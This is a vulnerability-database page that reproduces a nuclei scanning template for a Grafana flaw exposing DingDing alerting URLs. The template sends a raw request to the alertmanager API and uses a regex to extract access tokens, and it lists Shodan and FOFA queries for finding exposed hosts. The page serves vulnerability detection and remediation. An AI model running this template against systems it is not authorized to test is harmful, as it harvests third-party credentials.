Lucene search
K

Grafana - Exposes DingDing API Keys

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Grafana inadvertently exposes DingDing API keys due to configuration oversight in versions ≤ 12.0.1.

Related
Refs
Code
id: CVE-2025-3415

info:
  name: Grafana - Exposes DingDing API Keys
  author: lucasribolli
  severity: medium
  description: |
    An incident occurred where the DingDing alerting integration URL was inadvertently exposed to viewers due to a setting oversight in versions below or equals to 12.0.1.
  impact: |
    Viewers can access DingDing alerting integration URLs containing access tokens through the alertmanager API, potentially enabling unauthorized message delivery and notification manipulation.
  remediation: |
    Upgrade to Grafana version 12.0.2 or later that properly restricts access to DingDing integration settings.
  reference:
    - https://grafana.com/blog/2025/06/13/grafana-security-update-medium-severity-security-release-for-cve-2025-3415/
  classification:
    epss-score: 0.0089
    epss-percentile: 0.55013
  metadata:
    verified: true
    max-request: 1
    vendor: grafana
    product: grafana
    shodan-query:
      - http.title:"grafana"
      - cpe:"cpe:2.3:a:grafana:grafana"
    fofa-query:
      - title="grafana"
      - app="grafana"
    google-query: intitle:"grafana"
  tags: cve,cve2025,grafana,dingding,dingtalk,apikey,vkev,vuln

http:
  - raw:
      - |
        GET /api/alertmanager/grafana/config/api/v1/alerts HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "dingtalk.com","dingding-context")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 200'
        condition: and

    extractors:
      - type: regex
        name: dingding-integration-url
        part: body
        regex:
          - '(?i)https?://oapi\.dingtalk\.com/robot/send\?access_token=[^&"\s]+'
# digest: 4a0a00473045022039613bbcc9e9a5636ce8ee0f60f697ac16bb3486975ccbed5cd1c5f976a1ad01022100f5ec3455cd6ccedf7e12c2f471f5237141d1c8ebb4d6cb4cc82025bb8009d9ee:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.14.3
EPSS0.0089
SSVC
25